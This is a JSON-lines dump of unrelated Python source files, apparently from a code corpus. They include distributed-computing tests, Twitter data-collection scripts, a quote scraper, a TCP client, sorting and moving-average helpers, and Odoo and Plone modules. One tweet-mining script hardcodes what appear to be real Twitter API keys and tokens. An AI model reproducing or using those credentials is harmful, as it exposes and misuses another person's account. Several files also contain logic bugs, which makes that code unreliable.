yield e._restart()\n assert f is e\n\n assert len(s.stacks) == 2\n assert len(s.processing) == 2\n\n assert not s.who_has\n\n assert x.cancelled()\n assert y.cancelled()\n assert z.cancelled()\n assert z.key not in s.exceptions\n\n assert not s.who_wants\n assert not s.wants_what\n\n\n@gen_cluster(Worker=Nanny, executor=True)\ndef test_restart_cleared(e, s, a, b):\n x = 2 * delayed(1) + 1\n f = e.compute(x)\n yield _wait([f])\n assert s.released\n\n yield e._restart()\n\n for coll in [s.tasks, s.dependencies, s.dependents, s.waiting,\n s.waiting_data, s.who_has, s.restrictions, s.loose_restrictions,\n s.released, s.priority, s.exceptions, s.who_wants,\n s.exceptions_blame]:\n assert not coll\n\n\ndef test_restart_sync_no_center(loop):\n with cluster(nanny=True) as (s, [a, b]):\n with Executor(('127.0.0.1', s['port']), loop=loop) as e:\n x = e.submit(inc, 1)\n e.restart()\n assert x.cancelled()\n y = e.submit(inc, 2)\n assert y.result() == 3\n assert len(e.ncores()) == 2\n\n\ndef test_restart_sync(loop):\n with cluster(nanny=True) as (s, [a, b]):\n with Executor(('127.0.0.1', s['port']), loop=loop) as e:\n x = e.submit(div, 1, 2)\n x.result()\n\n assert sync(loop, e.scheduler.who_has)\n e.restart()\n assert not sync(loop, e.scheduler.who_has)\n assert x.cancelled()\n assert len(e.ncores()) == 2\n\n with pytest.raises(CancelledError):\n x.result()\n\n y = e.submit(div, 1, 3)\n assert y.result() == 1 / 3\n\n\ndef test_restart_fast(loop):\n with cluster(nanny=True) as (s, [a, b]):\n with Executor(('127.0.0.1', s['port']), loop=loop) as e:\n L = e.map(sleep, range(10))\n\n start = time()\n e.restart()\n assert time() - start < 5\n assert len(e.ncores()) == 2\n\n assert all(x.status == 'cancelled' for x in L)\n\n x = e.submit(inc, 1)\n assert x.result() == 2\n\n\n@gen_cluster(Worker=Nanny, executor=True)\ndef test_fast_kill(e, s, a, b):\n L = e.map(sleep, range(10))\n\n start = time()\n yield e._restart()\n assert time() - start < 5\n\n assert all(x.status == 'cancelled' for x in L)\n\n x = e.submit(inc, 1)\n result = yield x._result()\n assert result == 2\n\n\n@gen_cluster(Worker=Nanny)\ndef test_multiple_executors_restart(s, a, b):\n e1 = Executor((s.ip, s.port), start=False)\n yield e1._start()\n e2 = Executor((s.ip, s.port), start=False)\n yield e2._start()\n\n x = e1.submit(inc, 1)\n y = e2.submit(inc, 2)\n xx = yield x._result()\n yy = yield y._result()\n assert xx == 2\n assert yy == 3\n\n yield e1._restart()\n\n assert x.cancelled()\n assert y.cancelled()\n\n yield e1._shutdown(fast=True)\n yield e2._shutdown(fast=True)\n\n\n@gen_cluster(Worker=Nanny, executor=True)\ndef test_forgotten_futures_dont_clean_up_new_futures(e, s, a, b):\n x = e.submit(inc, 1)\n yield e._restart()\n y = e.submit(inc, 1)\n del x\n import gc; gc.collect()\n yield gen.sleep(0.1)\n yield y._result()\n\n\n@gen_cluster(executor=True, timeout=60)\ndef test_broken_worker_during_computation(e, s, a, b):\n n = Nanny(s.ip, s.port, ncores=2, loop=s.loop)\n n.start(0)\n\n start = time()\n while len(s.ncores) < 3:\n yield gen.sleep(0.01)\n assert time() < start + 5\n\n L = e.map(inc, range(256))\n for i in range(8):\n L = e.map(add, *zip(*partition_all(2, L)))\n\n from random import random\n yield gen.sleep(random() / 2)\n n.process.terminate()\n yield gen.sleep(random() / 2)\n n.process.terminate()\n\n result = yield e._gather(L)\n assert isinstance(result[0], int)\n\n yield n._close()\n\n\n@gen_cluster(executor=True, Worker=Nanny)\ndef test_restart_during_computation(e, s, a, b):\n xs = [delayed(slowinc)(i, delay=0.01) for i in range(50)]\n ys = [delayed(slowinc)(i, delay=0.01) for i in xs]\n zs = [delayed(slowadd)(x, y, delay=0.01) for x, y in zip(xs, ys)]\n total = delayed(sum)(zs)\n result = e.compute(total)\n\n yield gen.sleep(0.5)\n assert s.rprocessing\n yield e._restart()\n assert not s.rprocessing\n\n assert len(s.ncores) == 2\n assert not s.task_state\n","sub_path":"distributed/tests/test_worker_failure.py","file_name":"test_worker_failure.py","file_ext":"py","file_size_in_byte":7175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"424876437","text":"##!/usr/bin/python3.4\nimport sys\nsys.path.insert(0, '../master')\nimport database\n\nimport time\nimport configparser\nimport tweepy\nimport numpy as np\nnp.set_printoptions(threshold=np.nan)\nimport urllib.request as urllib2\n\nclass User_Features():\n def __init__(self, db, api):\n self.db = db\n self.api = api\n \n def check_Internet_Connection(self): \n #print('checking internet connection ....')\n status = \"ACTIVE\"\n try:\n urllib2.urlopen('https://twitter.com/', timeout=1)\n except urllib2.URLError:\n status = \"INACTIVE\"\n duration = 3\n print('INTERNET NOT PRESENT. It will Retry itself after '+str(duration)+' seconds')\n time.sleep(duration)\n self.check_Internet_Connection()\n return status\n \n def read_user_features(self):\n self.db.delete_user_based()\n \n verified_rank = 0\n url_exists_rank = 0\n desc_exists_rank = 0\n nr_tweets = 0\n nr_followers = 0\n nr_friends = 0\n user_row = \"0 0 0 0 0 0 0\" # these values will be removed as a removal of 1st row after the matrix creation\n data = \"\"\n\n cursor = self.db.get_ids_from_tweets()\n user_count = 0\n \n for row in cursor:\n tweetId = row[0]\n userId = row[1]\n user_count = user_count + 1\n print('User Count :'+str(user_count) +' | '+'Currently Processing for User :'+str(userId))\n\n try:\n status_value = self.check_Internet_Connection()\n if 'ACTIVE' in status_value:\n data = self.api.get_user(userId)\n else:\n while (status_value ==\"INACTIVE\"):\n self.check_Internet_Connection() \n except tweepy.TweepError:\n print('Information for tweet', tweetId,'cannot be retrieved and it was deleted from database') \n self.db.delete_tweet(tweetId)\n self.db.delete_from_content(tweetId)\n\n if \"True\" in str(data.verified):\n verified_rank = 1 # provide rank 1 if the user is a verified user\n else:\n verified_rank = 0 \n \n if data.description is not None:\n desc_exists_rank = 1 # provide rank 1 if the user account has description\n else:\n verified_rank = 0 \n \n if data.url is not None:\n url_exists_rank = 1 # provide rank 1 if the user account has url attached to the account\n else:\n verified_rank = 0 \n\n nr_tweets = data.statuses_count\n nr_followers = data.followers_count\n nr_friends = data.friends_count \n \n ##Create an array with the features\n features = [userId, verified_rank, desc_exists_rank, url_exists_rank, nr_tweets, nr_followers, nr_friends ]\n \n ##Call the method from database.py file\n self.db.insert_user_based(features)\n self.db.commit_db()\n \n user_row = user_row +' ;' +str(userId)+' ' +str(verified_rank)+' ' +str(desc_exists_rank)+' ' +str(url_exists_rank)+' '+str(nr_tweets)+' '+str(nr_followers)+' '+str(nr_friends)\n\n verified_rank = 0\n url_exists_rank = 0\n desc_exists_rank = 0\n nr_tweets = 0\n nr_followers = 0\n nr_friends = 0\n data = \"\"\n #print(user_row)\n\n user_matrix = np.matrix(user_row)\n user_matrix = np.delete(user_matrix, (0), axis=0)\n #User matrix is now stored in object user_matrix\n #print(user_matrix)\n return True\n\ndef main(db_name):\n print(\"\\n USER BASED ANALYSIS\\n\")\n ##establish the connection with the twitter api by reading credentials from config.ini file\n config = configparser.ConfigParser()\n config.read('../user.ini')\n \n consumer_key = config.get('Twitter', 'consumer_key')\n consumer_secret = config.get('Twitter', 'consumer_secret')\n access_token = config.get('Twitter', 'access_token')\n access_secret = config.get('Twitter', 'access_secret')\n\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_secret)\n api = tweepy.API(auth, wait_on_rate_limit = True, wait_on_rate_limit_notify = True)\n\n db = database.main(db_name)\n db.connect()\n \n obj = User_Features(db, api)\n obj.check_Internet_Connection()\n obj.read_user_features()\n \n db.close_db()\n\nif __name__ == '__main__':\n main()\n","sub_path":"user-based/user_features.py","file_name":"user_features.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"588500907","text":"from apps.API_VK.command.CommonCommand import CommonCommand\n\nMAX_QUOTES = 20\n\nclass Bash(CommonCommand):\n def __init__(self):\n names = [\"баш\"]\n help_text = \"Баш - рандомная цитата с баша\"\n detail_help_text = \"Баш [(N)] - рандомная цитата с баша. N - количество цитат. Максимум 25\"\n super().__init__(names, help_text, detail_help_text, int_args=[0])\n\n def start(self):\n quotes_count = 5\n if self.vk_event.args:\n self.parse_args('int')\n quotes_count = self.vk_event.args[0]\n self.check_number_arg_range(quotes_count, 1, MAX_QUOTES)\n return parse_bash(quotes_count)\n\n\ndef parse_bash(quotes_count):\n try:\n import requests\n from lxml import html\n r = requests.get('http://bash.im/random')\n doc = html.document_fromstring(r.text)\n html_quotes = doc.xpath('//*[@class=\"quotes\"]/article/div/div[@class=\"quote__body\"]')\n bash_quotes = []\n for i in range(quotes_count):\n html_quote = \"\\n\".join(html_quotes[i].xpath('text()'))\n bash_quotes.append(html_quote.strip('\\n').strip(' ').strip('\\n'))\n\n return \"\\n——————————————————\\n\".join(bash_quotes)\n except Exception as e:\n print(e)\n return \"Ошибка\"\n","sub_path":"apps/API_VK/command/commands/Bash.py","file_name":"Bash.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"258820208","text":"#!/usr/bin/python\n\nfrom logger import logger\nfrom termcolor import colored\nimport sys\nimport socket\nimport threading\nimport queue\nimport subprocess\n\nclass tcpserver:\n\n\tdef __init__( self,\n\t\t\t\tlport = 2706,\n\t\t\t\trhost = \"google.com\",\n\t\t\t\trport = 80,\n\t\t\t\tbuffer_size = 4096,\n\t\t\t\tloglevel = 6,\n\t\t\t\tlogfile = None,\n\t\t\t\tq = None ):\n\n\t\tself.lport = lport\n\t\tself.rhost = rhost\n\t\tself.rport = rport\n\t\tself.buffer_size = buffer_size\n\t\tself.logfile = logfile\n\t\tself.loglevel = loglevel\n\t\tself.accept_msg = True\n\t\tself.log = None\n\t\tself.client_thread = None\n\t\tself.client_sock = None\n\t\tself.server_sock = None\n\t\tself.q = None\n\n\t\tif q is not None :\n\t\t\tself.q = q\n\t\telse :\n\t\t\tself.q = queue.Queue()\n\n\tdef __getmsgs ( self, q , buffer_size=4096 ):\n\n\t\t# Child function for getmessages\n\t\trecv_len = 1\n\t\tresponse = \"\"\n\n\t\twhile self.accept_msg:\n\n\t\t\twhile recv_len:\n\t\t\t\tbuffer = self.client_sock.recv ( buffer_size )\n\t\t\t\trecv_len = len ( buffer )\n\t\t\t\tresponse += buffer\n\n\t\t\t\tif recv_len < buffer_size:\n\t\t\t\t\tbreak;\n\n\t\t\tself.log.info ( str(response) )\n\t\t\tself.q.put ( response )\n\n\t\tq.put ( msgs )\n\t\treturn True\n\n\tdef start ( self ):\n\n\t\tself.log = logger ( verbose=self.loglevel , logfile=self.logfile, tmstp_date=False )\n\n\t\tself.log.info ( \"Starting full duplex communication\" )\n\n\t\tself.log.info ( \"Creating client sock\" )\n\t\tself.log.info ( \"Host : \" + self.log.green_mark ( self.rhost ) )\n\t\tself.log.info ( \"Port : \" + self.log.green_mark ( self.rport ) )\n\n\t\ttry:\n\t\t\tself.client_sock = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )\n\t\t\tself.client_sock.connect ( (self.rhost, self.rport) )\n\t\t\tself.log.success ( \"Connected to server.\" )\n\t\t\tself.log.info ( \"Start to listen.\" )\n\n\t\t\tself.client_thread = threading.Thread ( target=self.__getmsgs , args=[ self.q ,self.buffer_size ] )\n\t\t\tself.client_thread.start ()\n\n\t\texcept:\n\n\t\t\tself.log.danger ( \"TCP connection error\" )\n\t\t\tself.log.fail ( str (sys.exc_info()[1]) )\n\n\tdef transmit ( self , buffer ):\n\t\tif self.client_sock is not None and len(buffer):\n\t\t\tself.client_sock.send( buffer )\n\n\tdef getmessages ( self ):\n\t\treturn self.q.get()\n\n\n#d = tcpserver( loglevel = 6, logfile=\"pepe.log\" )\n#d.start()\n\n# Sending and reading a request \n#d.transmit (\"GET / HTTP/1.1\\r\\nHost: google.com\\r\\n\\r\\n\")\n#d.transmit (\"GET / HTTP/1.1\\r\\nHost: google.com\\r\\n\\r\\n\")\n#d.transmit (\"GET / HTTP/1.1\\r\\nHost: google.com\\r\\n\\r\\n\")\n\n#print d.getmessages () \n\n","sub_path":"myModules/tcpserver.py","file_name":"tcpserver.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"228927213","text":"def bubble_sort(seq):\n changed = True\n while True:\n if not changed:break\n changed = False\n for i in range(len(seq) - 1):\n if seq[i] > seq[i+1]:\n seq[i], seq[i+1] = seq[i+1], seq[i]\n changed = True\n return seq\n\n\nif __name__ == \"__main__\":\n n=int(input())\n seq=[]\n for i in range (0,n):\n seq.append(int(input()))\n seq=bubble_sort(seq)\n for x in seq:\n print(x)\n","sub_path":"[Contest]/[20150725]Magic-Lines-July-2015/Fixing-bubble-sort.py","file_name":"Fixing-bubble-sort.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"425149007","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 15 22:30:06 2017\n\n@author: ShengliangDai\n\"\"\"\n\nimport pandas as pd\nimport tweepy\nfrom time import sleep\n\napi_key = \"tDTMJtC7sAz39hEj4rX5vb0sJ\" # <---- Add your API Key\napi_secret = \"5D9lXFpNr5Mpr8D4SQCak4pDH4NpzvyhmxXT4h5lxRYGqtfDHg\" # <---- Add your API Secret\naccess_token = \"1196013206-P6T1RgOl9Dwq70RUNXrczzjSxsuQtrlKimQBGmn\" # <---- Add your access token\naccess_token_secret = \"hBq8zik4WntPTB2hZEfSpVZNA0F7zAtj3mKjvb4GHyklz\" # <---- Add your access token secret\n\nauth = tweepy.OAuthHandler(api_key, api_secret)\nauth.set_access_token(access_token, access_token_secret)\n\napi = tweepy.API(auth)\n\nresults = []\nquery = [\"freezing rain\"]\nnum_search = 36\nfor n in range(num_search):\n print(\"The {} times search\".format(n))\n for tweet in tweepy.Cursor(api.search, q=query).items(500):\n results.append(tweet)\n if n == num_search - 1:\n break\n print(\"Sleep 20 minutes...{} times left\".format(num_search - 1 - n))\n sleep(1200)\n\ndef process_results(results):\n id_list = [tweet.id for tweet in results]\n data_set = pd.DataFrame(id_list, columns=[\"id\"])\n\n # Processing Tweet Data\n\n data_set[\"text\"] = [tweet.text for tweet in results]\n media = []\n expanded_url = []\n for tweet in results:\n if \"media\" in tweet.entities:\n for image in tweet.entities[\"media\"]:\n media.append(image[\"media_url\"])\n if 'video' in image[\"expanded_url\"]:\n expanded_url.append(image[\"expanded_url\"]) \n else:\n expanded_url.append(None)\n else:\n media.append(None)\n expanded_url.append(None)\n data_set[\"media_url\"] = media\n data_set[\"video_url\"] = expanded_url\n \n data_set[\"created_at\"] = [tweet.created_at for tweet in results]\n data_set[\"retweet_count\"] = [tweet.retweet_count for tweet in results]\n data_set[\"favorite_count\"] = [tweet.favorite_count for tweet in results]\n data_set[\"source\"] = [tweet.source for tweet in results]\n\n # Processing User Data\n data_set[\"user_id\"] = [tweet.author.id for tweet in results]\n data_set[\"user_screen_name\"] = [tweet.author.screen_name for tweet in results]\n data_set[\"user_name\"] = [tweet.author.name for tweet in results]\n data_set[\"user_created_at\"] = [tweet.author.created_at for tweet in results]\n data_set[\"user_description\"] = [tweet.author.description for tweet in results]\n data_set[\"user_followers_count\"] = [tweet.author.followers_count for tweet in results]\n data_set[\"user_friends_count\"] = [tweet.author.friends_count for tweet in results]\n data_set[\"user_location\"] = [tweet.author.location for tweet in results]\n data_set[\"user_coordinates\"] = [tweet.coordinates for tweet in results]\n\n return data_set\ndata_set = process_results(results)\ndata_set.to_csv(\"freezing rain-jan19.csv\")\nprint(\"Finish!\")","sub_path":"twitter-api/ice-storm-mining.py","file_name":"ice-storm-mining.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"86886302","text":"# Moving Averages Code\n\n# Load the necessary packages and modules\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport data.stock as st\n\n\n# Simple Moving Average \ndef SMA(data, ndays):\n SMA = pd.Series(data['close'].rolling(ndays).mean(), name='SMA')\n # SMA = pd.Series(pd.rolling_mean(data['close'], ndays), name='SMA')\n data = data.join(SMA)\n return data\n\n\n# Exponentially-weighted Moving Average\ndef EWMA(data, ndays):\n EMA = pd.Series(pd.DataFrame.ewm(data['close'],\n span=ndays,\n min_periods=ndays - 1).mean(),\n name='EWMA')\n data = data.join(EMA)\n return data\n\n\n# Retrieve the Nifty data from Yahoo finance:\n# XSHE000002_data = st.get_csv_data('000002.XSHE', 'price')\n# close = XSHE000002_data['close']\n#\n# # Compute the 50-day SMA for NIFTY\n# n = 50\n# SMA_NIFTY = SMA(XSHE000002_data, n)\n# SMA_NIFTY = SMA_NIFTY.dropna()\n# SMA = SMA_NIFTY['SMA']\n\n\ndef get_sma(stock_code, ndays):\n stock_data = st.get_csv_data(stock_code, 'price')\n sma_data = SMA(stock_data, ndays)\n sma_data = sma_data.dropna()\n return sma_data['SMA']\n\n\ndef get_ewma(stock_code, ndays):\n stock_data = st.get_csv_data(stock_code, 'price')\n ewma_data = EWMA(stock_data, ndays)\n ewma_data = ewma_data.dropna()\n return ewma_data['EWMA']\n\n# Compute the 200-day EWMA for NIFTY\n# ew = 200\n# EWMA_NIFTY = EWMA(XSHE000002_data, ew)\n# EWMA_NIFTY = EWMA_NIFTY.dropna()\n# EWMA = EWMA_NIFTY['EWMA_200']\n\n# Plotting the NIFTY Price Series chart and Moving Averages below\n# plt.figure(figsize=(9, 5))\n# plt.plot(XSHE000002_data['close'], lw=1, label='NSE Prices')\n# plt.plot(SMA, 'g', lw=1, label='50-day SMA (green)')\n# plt.plot(EWMA, 'r', lw=1, label='200-day EWMA (red)')\n# plt.legend(loc=2, prop={'size': 11})\n# plt.grid(True)\n# plt.setp(plt.gca().get_xticklabels(), rotation=30)\n# plt.show()\n","sub_path":"feature/MA.py","file_name":"MA.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"352603651","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/Mardix/Dropbox/Projects/Python/harambe/harambe/contrib/views/contact_page.py\n# Compiled at: 2017-02-26 06:59:25\n\"\"\"\nContact Page\n\"\"\"\nfrom harambe import Harambe, _, get_config, url_for, abort, request, utils, flash_success, flash_error, flash_data, get_flash_data, send_mail, recaptcha, page_meta, redirect, decorators as deco, exceptions\nfrom harambe.contrib.app_option import AppOption\nimport logging\n__version__ = '1.0.0'\n__options__ = {}\n\nclass Main(Harambe):\n app_option = AppOption(__name__)\n\n @classmethod\n def _register(cls, app, **kwargs):\n \"\"\" Reset some params \"\"\"\n nav = __options__.get('nav', {})\n nav.setdefault('title', 'Contact')\n nav.setdefault('visible', True)\n nav.setdefault('order', 100)\n title = nav.pop('title')\n deco.nav_title.add(title, cls.index, **nav)\n kwargs['base_route'] = __options__.get('route', '/contact/')\n cls.app_option.init({'recipients': __options__.get('recipients'), \n 'success_message': __options__.get('success_message', 'Message sent. Thanks!')}, 'Contact Page Options')\n super(cls, cls)._register(app, **kwargs)\n\n @deco.route('/', methods=['GET', 'POST'])\n def index(self):\n recipients = self.app_option.get('recipients') or __options__.get('recipients') or get_config('CONTACT_EMAIL')\n if not recipients:\n abort(500, 'ContactPage missing email recipient')\n success_message = self.app_option.get('success_message') or __options__.get('success_message')\n return_to = __options__.get('return_to', None)\n if return_to:\n if '/' not in return_to:\n return_to = url_for(return_to)\n else:\n return_to = url_for(self)\n if request.method == 'POST':\n email = request.form.get('email')\n subject = request.form.get('subject')\n message = request.form.get('message')\n name = request.form.get('name')\n try:\n if recaptcha.verify():\n if not email or not subject or not message:\n raise exceptions.AppError('All fields are required')\n elif not utils.is_email_valid(email):\n raise exceptions.AppError('Invalid email address')\n else:\n try:\n send_mail(to=recipients, reply_to=email, mail_from=email, mail_subject=subject, mail_message=message, mail_name=name, template=__options__.get('template', 'contact-us.txt'))\n flash_data('ContactPage:EmailSent')\n except Exception as ex:\n logging.exception(ex)\n raise exceptions.AppError('Unable to send email')\n\n else:\n raise exceptions.AppError('Security code is invalid')\n except exceptions.AppError as e:\n flash_error(e.message)\n\n return redirect(self)\n else:\n title = __options__.get('title', _('Contact Us'))\n page_meta(title)\n fd = get_flash_data()\n return {'title': title, \n 'email_sent': True if fd and 'ContactPage:EmailSent' in fd else False, \n 'success_message': success_message, \n 'return_to': return_to}","sub_path":"pycfiles/Harambe-0.10.0.tar/contact_page.py","file_name":"contact_page.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"380040277","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# Copyright (c) 2021-Present IjVine Corporation ()\n\n##############################################################################\nfrom odoo import api,fields,models\nfrom odoo.addons.ijvine_ebay_base.tools import extract_list as EL\n\nfrom logging import getLogger\n_logger = getLogger(__name__)\n\nPartnerFields = [\n\t'name',\n\t'store_id',\n\n\t'email',\n\t'phone',\n\t'mobile',\n\t'website',\n\t'last_name',\n\t'street',\n\t'street2',\n\t'city',\n\t'zip',\n\t'state_id',\n\t'state_name',\n\t'country_id',\n\t'type',\n\t'parent_id'\n]\n\nclass PartnerFeed(models.Model):\n\t_name = 'partner.feed'\n\t_inherit = 'ijvine.feed'\n\t_description = 'Partner Feed'\n\n\temail = fields.Char('Email')\n\tphone = fields.Char('Phone')\n\tmobile = fields.Char('Mobile')\n\twebsite = fields.Char('Website URL')\n\tlast_name = fields.Char('Last Name')\n\tstreet = fields.Char('Street')\n\tstreet2 = fields.Char('street2')\n\tcity = fields.Char('City')\n\tzip = fields.Char('Zip')\n\tstate_name = fields.Char('State Name')\n\tstate_id = fields.Char('State Code')\n\tcountry_id = fields.Char('Country Code')\n\tparent_id = fields.Char('Store Parent ID')\n\ttype = fields.Selection(\n\t\tselection = [\n\t\t\t('contact','Contact'),\n\t\t\t('invoice','Invoice'),\n\t\t\t('delivery','Delivery'),\n\t\t],\n\t\tdefault = 'contact',\n\t\trequired = True\n\t)\n\n\t@api.model\n\tdef _create_feeds(self,partner_data_list):\n\t\tsuccess_ids,error_ids = [],[]\n\t\tself = self.contextualize_feeds('partner')\n\t\tfor partner_data in partner_data_list:\n\t\t\tfeed = self._create_feed(partner_data)\n\t\t\tif feed:\n\t\t\t\tself += feed\n\t\t\t\tsuccess_ids.append(partner_data.get('store_id'))\n\t\t\telse:\n\t\t\t\terror_ids.append(partner_data.get('store_id'))\n\t\treturn success_ids,error_ids,self\n\n\tdef _create_feed(self,partner_data):\n\t\tcontact_data_list = partner_data.pop('contacts',[])\n\t\tchannel_id = partner_data.get('channel_id')\n\t\tstore_id = str(partner_data.get('store_id'))\n\t\tfeed_id = self._context.get('partner_feeds').get(channel_id,{}).get(store_id)\n# Todo(Pankaj Kumar): Change feed field from state_id,country_id to state_code,country_code\n\t\tpartner_data['state_id'] = partner_data.pop('state_code',False)\n\t\tpartner_data['country_id'] = partner_data.pop('country_code',False)\n# & remove this code\n\t\ttry:\n\t\t\tif feed_id:\n\t\t\t\tfeed = self.browse(feed_id)\n\t\t\t\tpartner_data.update(state='draft')\n\t\t\t\tfeed.write(partner_data)\n\t\t\telse:\n\t\t\t\tfeed = self.create(partner_data)\n\t\texcept Exception as e:\n\t\t\t_logger.error(\n\t\t\t\t\"Failed to create feed for Customer: \"\n\t\t\t\tf\"{partner_data.get('store_id')}\"\n\t\t\t\tf\" Due to: {e.args[0]}\"\n\t\t\t)\n\t\telse:\n\t\t\tfor contact_data in contact_data_list:\n\t\t\t\tfeed+=self._create_feed(contact_data)\n\t\t\treturn feed\n\n\tdef import_partner(self,channel_id):\n\t\tself.ensure_one()\n\t\tmessage = \"\"\n\t\tstate = 'done'\n\t\tupdate_id = None\n\t\tcreate_id = None\n\n\t\tvals = EL(self.read(PartnerFields))\n\t\t_type =vals.get('type')\n\t\tstore_id = vals.pop('store_id')\n\t\tvals.pop('website_message_ids','')\n\t\tvals.pop('message_follower_ids','')\n\t\tmatch = channel_id.match_partner_mappings(store_id,_type)\n\t\tname = vals.pop('name')\n\t\tif not name:\n\t\t\tmessage+=\" Partner without name can't evaluated.\"\n\t\t\tstate = 'error'\n\t\tif not store_id:\n\t\t\tmessage+=\" Partner without store id can't evaluated.\"\n\t\t\tstate = 'error'\n\t\tparent_store_id = vals['parent_id']\n\t\tif parent_store_id:\n\t\t\tpartner_res = self.get_partner_id(parent_store_id,channel_id=channel_id)\n\t\t\tmessage += partner_res.get('message')\n\t\t\tpartner_id = partner_res.get('partner_id')\n\t\t\tif partner_id:\n\t\t\t\tvals['parent_id'] =partner_id.id\n\t\t\telse:\n\t\t\t\tstate = 'error'\n\t\tif state == 'done':\n\t\t\tcountry_id = vals.pop('country_id')\n\t\t\tif country_id:\n\t\t\t\tcountry_id = channel_id.get_country_id(country_id)\n\t\t\t\tif country_id:\n\t\t\t\t\tvals['country_id'] = country_id.id\n\t\t\tstate_id = vals.pop('state_id')\n\t\t\tstate_name = vals.pop('state_name')\n\n\t\t\tif (state_id or state_name) and country_id:\n\t\t\t\tstate_id = channel_id.get_state_id(state_id,country_id,state_name)\n\t\t\t\tif state_id:\n\t\t\t\t\tvals['state_id'] = state_id.id\n\t\t\tlast_name = vals.pop('last_name','')\n\t\t\tif last_name:\n\t\t\t\tvals['name'] = \"%s %s\" % (name, last_name)\n\t\t\telse:\n\t\t\t\tvals['name'] =name\n\t\tif match:\n\t\t\tif state =='done':\n\t\t\t\ttry:\n\t\t\t\t\tmatch.odoo_partner.write(vals)\n\t\t\t\t\tmessage +=' Partner %s successfully updated'%(name)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tmessage += ' %s' % (e)\n\t\t\t\t\tstate = 'error'\n\t\t\t\tupdate_id = match\n\n\t\t\telif state =='error':\n\t\t\t\tmessage+='Error while partner updated.'\n\n\t\telse:\n\t\t\tif state == 'done':\n\t\t\t\ttry:\n\t\t\t\t\terp_id = self.env['res.partner'].create(vals)\n\t\t\t\t\tcreate_id = channel_id.create_partner_mapping(erp_id, store_id,_type)\n\t\t\t\t\tmessage += ' Partner %s successfully evaluated.'%(name)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tmessage += ' %s' % (e)\n\t\t\t\t\tstate = 'error'\n\t\tself.set_feed_state(state=state)\n\t\tself.message = \"%s %s\" % (self.message, message)\n\t\treturn dict(\n\t\t\tcreate_id=create_id,\n\t\t\tupdate_id=update_id,\n\t\t\tmessage=message\n\t\t)\n\n\tdef import_items(self):\n\t\tself = self.contextualize_feeds('partner',self.mapped('channel_id').ids)\n\t\tself = self.contextualize_mappings('partner',self.mapped('channel_id').ids)\n\t\tupdate_ids=[]\n\t\tcreate_ids=[]\n\t\tmessage = ''\n\n\t\tfor record in self:\n\t\t\tchannel_id = record.channel_id\n\t\t\tsync_vals = dict(\n\t\t\tstatus ='error',\n\t\t\taction_on ='customer',\n\t\t\taction_type ='import',\n\t\t\t)\n\t\t\tres = record.import_partner(channel_id)\n\t\t\tmsz= res.get('message', '')\n\t\t\tmessage+=msz\n\t\t\tupdate_id = res.get('update_id')\n\t\t\tif update_id:\n\t\t\t\tupdate_ids.append(update_id)\n\t\t\tcreate_id = res.get('create_id')\n\t\t\tif create_id:\n\t\t\t\tcreate_ids.append(create_id)\n\t\t\tmapping_id = update_id or create_id\n\t\t\tif mapping_id:\n\t\t\t\tsync_vals['status'] = 'success'\n\t\t\t\tsync_vals['ecomstore_refrence'] = mapping_id.store_customer_id\n\t\t\t\tsync_vals['odoo_id'] = mapping_id.odoo_partner_id\n\t\t\tsync_vals['summary'] = msz\n\t\t\trecord.channel_id._create_sync(sync_vals)\n\t\tif self._context.get('get_mapping_ids'):\n\t\t\t return dict(\n\t\t\t\tupdate_ids=update_ids,\n\t\t\t\tcreate_ids=create_ids,\n\t\t\t)\n\t\tmessage = self.get_feed_result(feed_type='Partner')\n\t\treturn self.env['multi.channel.sale'].display_message(message)\n\n\t","sub_path":"ijvine_ebay/ijvine_ebay_base/models/feeds/partner_feed.py","file_name":"partner_feed.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"212577240","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/Products/BastionCrypto/SignedDocument.py\n# Compiled at: 2012-03-06 02:26:51\n\"\"\"$id$\"\"\"\n__version__ = '$Revision: 67 $'[11:-2]\nimport AccessControl\nfrom zExceptions.unauthorized import Unauthorized\nfrom Acquisition import aq_base\nfrom Products.ATContentTypes.content.document import ATDocument as Document\nfrom Products.CMFCore.permissions import View, ModifyPortalContent\nfrom Permissions import sign_documents\nfrom DocumentTemplate.DT_Util import html_quote\nfrom zope.structuredtext.html import HTML\nfrom App.Common import rfc1123_date\nfrom Products.CMFCore.utils import getToolByName\nimport BastionPGPKey\nformat_stx = HTML()\ntry:\n from webdav.Lockable import wl_isLocked\nexcept ImportError:\n\n def wl_isLocked(ob):\n return 0\n\n\ndef html_headcheck(html):\n \"\"\" Return 'true' if document looks HTML-ish enough.\n\n If true bodyfinder() will be able to find the HTML body.\n 